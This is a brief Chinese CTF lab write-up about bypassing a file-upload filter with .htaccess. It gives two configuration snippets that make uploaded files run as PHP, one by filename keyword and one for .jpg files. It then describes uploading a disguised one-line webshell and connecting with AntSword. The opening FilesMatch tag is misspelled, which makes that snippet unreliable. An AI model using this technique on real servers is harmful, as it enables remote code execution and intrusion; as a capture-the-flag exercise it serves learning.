8.29 CTFHUB 文件上传---htaccess
首先我们要写一个 .htaccess文件
注意 是 后缀名为 .htaccess的文件
两种:
First: 将文件名中含有 "hack" 的当作php文件执行
<FilesMath "hack">
SetHandler application/x-httpd-php
</FilesMatch>
Second: 将 .jpg后缀的文件当作php文件解析
AddType application/x-httpd-php .jpg
这样 上传 jpg格式的一句话木马 用AntSword连接即可获得 flag{}